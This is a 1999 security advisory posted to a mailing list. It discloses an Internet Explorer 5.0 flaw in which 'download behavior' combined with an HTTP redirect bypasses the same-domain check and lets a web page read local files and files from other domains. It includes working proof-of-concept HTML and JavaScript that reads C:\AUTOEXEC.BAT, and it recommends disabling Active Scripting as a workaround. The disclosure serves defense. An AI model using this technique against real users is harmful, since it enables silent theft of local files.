IE 5.0 security vulnerability - reading local (and from any domain) text files using "download behavior"

From: Georgi Guninski (joroat_private)
Date: Mon Sep 27 1999 - 05:04:44 PDT


    IE 5.0 security vulnerability - reading local (and from any domain) text
    files using "download behavior"
    
    Disclaimer:
    The opinions expressed in this advisory and program are my own and not
    of any company.
    The usual standard disclaimer applies, especially the fact that Georgi
    Guninski is not liable for any damages caused by direct or indirect use
    of the information or functionality provided by this program.
    Georgi Guninski bears NO responsibility for content or misuse of this
    program or any derivatives thereof.
    
    Description:
    
    Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (Windows 98 is
    presumably vulnerable as well) allows reading local text files (the
    extension does not matter) and parts of binary files.
    It is also possible to read text files from any domain and, in some
    cases, files from a web server behind a firewall.
    
    Details:
    
    The problem is the IE feature "download behavior".
    It allows clicking on a link to cause a callback function to be
    executed.
    When the callback function is invoked via the "startDownload" method,
    the downloaded file is passed as an argument to the callback function.
    Microsoft has implemented a security check which does not allow
    downloading files in this way from a different domain.
    But if the link points to a file in the same domain as the exploit page
    and an HTTP redirect is forced, the check is bypassed and the exploit
    works.
    It is not necessary for the user to click on the link; this may be done
    automatically.
    This vulnerability may be exploited using an HTML email message or a
    newsgroup posting.
    
    The code is:
    ----------------------------------------------------------------------------------------
    <SCRIPT>
    // Callback: startDownload passes the downloaded file's contents as "s"
    function doit(s)
    {
     alert ("Here is your file:\n"+s);
    }
    </SCRIPT>
    <!-- The anchor gets the default "download" behavior; its HREF calls
         startDownload() with a same-domain URL that then redirects -->
    <A ID="oD" STYLE="behavior:url(#default#download)"
    HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec',
    doit)">Click here to read C:\AUTOEXEC.BAT</A>.
    ----------------------------------------------------------------------------------------
    ("http://www.nat.bg/~joro/reject.cgi?autoexec" just does an HTTP redirect
    to file://c:/autoexec.bat)
    
    Workaround:
    Disable Active Scripting
    
    Demonstration is available at http://www.nat.bg/~joro/download2.html
    
    
    Regards,
    Georgi Guninski
    http://www.nat.bg/~joro
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:28 PDT